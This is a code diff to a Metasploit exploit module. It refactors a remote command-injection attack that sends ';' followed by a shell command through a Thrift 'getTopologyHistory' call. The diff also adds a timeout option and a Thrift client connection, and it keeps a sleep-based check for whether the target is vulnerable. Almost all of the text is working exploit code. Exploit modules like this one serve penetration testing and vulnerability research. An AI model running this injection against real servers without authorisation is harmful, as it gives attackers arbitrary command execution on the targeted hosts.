@@ -40,8 +40,6 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2021-10-25',
         'License' => MSF_LICENSE,
-        'Platform' => ['linux', 'unix'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Privileged' => false,
         'Targets' => [
           [
@@ -73,6 +71,12 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
     )
+
+    register_advanced_options(
+      [
+        OptInt.new('ThriftTimeout', [ true, 'Thrift response and connection timeout duration', 10 ])
+      ]
+    )
   end
 
   def check
@@ -84,13 +88,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     sleep_time = rand(5..10)
     response, elapsed_time = Rex::Stopwatch.elapsed_time do
-      execute_command("sleep #{sleep_time}", { disconnect: false })
-      recv_response(sleep_time + 5)
+      execute_command("sleep #{sleep_time}", timeout: sleep_time + 3)
     end
-    disconnect
 
     vprint_status("Elapsed time: #{elapsed_time} seconds")
-
     unless response && elapsed_time > sleep_time
       return CheckCode::Safe('Failed to test command injection.')
     end
@@ -99,6 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    connect
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
 
     case target['Type']
@@ -110,38 +112,34 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, opts = {})
-    # comment out the rest of the command to ensure it's only executed once and prefix a random tag to avoid caching
+    # comment out the rest of the command to ensure it's only executed once and append a random tag to avoid caching
     cmd = "#{cmd} ##{Rex::Text.rand_text_alphanumeric(4..8)}"
     vprint_status("Executing command: #{cmd}")
 
-    send_request([
-      Thrift::ThriftHeader.new(message_type: Thrift::ThriftMessageType::CALL, method_name: 'getTopologyHistory'),
-      Thrift::ThriftData.new(data_type: Thrift::ThriftDataType::T_UTF7, field_id: 1, data_value: ";#{cmd}"),
-      Thrift::ThriftData.new
-    ].map(&:to_binary_s).join)
-    disconnect if opts.fetch(:disconnect, true)
+    @thrift_client.call(
+      'getTopologyHistory',
+      Thrift::ThriftData.utf7(1, ";#{cmd}"),
+      Thrift::ThriftData.stop,
+      timeout: opts.fetch(:timeout, datastore['ThriftTimeout'])
+    )
+  rescue Rex::TimeoutError
+    nil
   end
 
-  def send_request(request)
-    connect if sock.nil?
-    sock.put([ request.length ].pack('N') + request)
+  def connect
+    @thrift_client = Rex::Proto::Thrift::Client.new(
+      target_host,
+      datastore['RPORT'],
+      context: { 'Msf' => framework, 'MsfExploit' => self },
+      timeout: datastore['ThriftTimeout']
+    )
+    @thrift_client.connect
   end
 
-  def recv_response(timeout)
-    remaining = timeout
-    res_size, elapsed = Rex::Stopwatch.elapsed_time do
-      sock.timed_read(4, remaining)
-    end
+  def cleanup
+    return unless @thrift_client
 
-    remaining -= elapsed
-    return nil if res_size.nil? || res_size.length != 4 || remaining <= 0
-
-    res = sock.timed_read(res_size.unpack1('N'), remaining)
-
-    return nil if res.nil? || res.length != res_size.unpack1('N')
-
-    return res_size + res
-  rescue Timeout::Error
-    return nil
+    @thrift_client.close
+    @thrift_client = nil
   end
 end
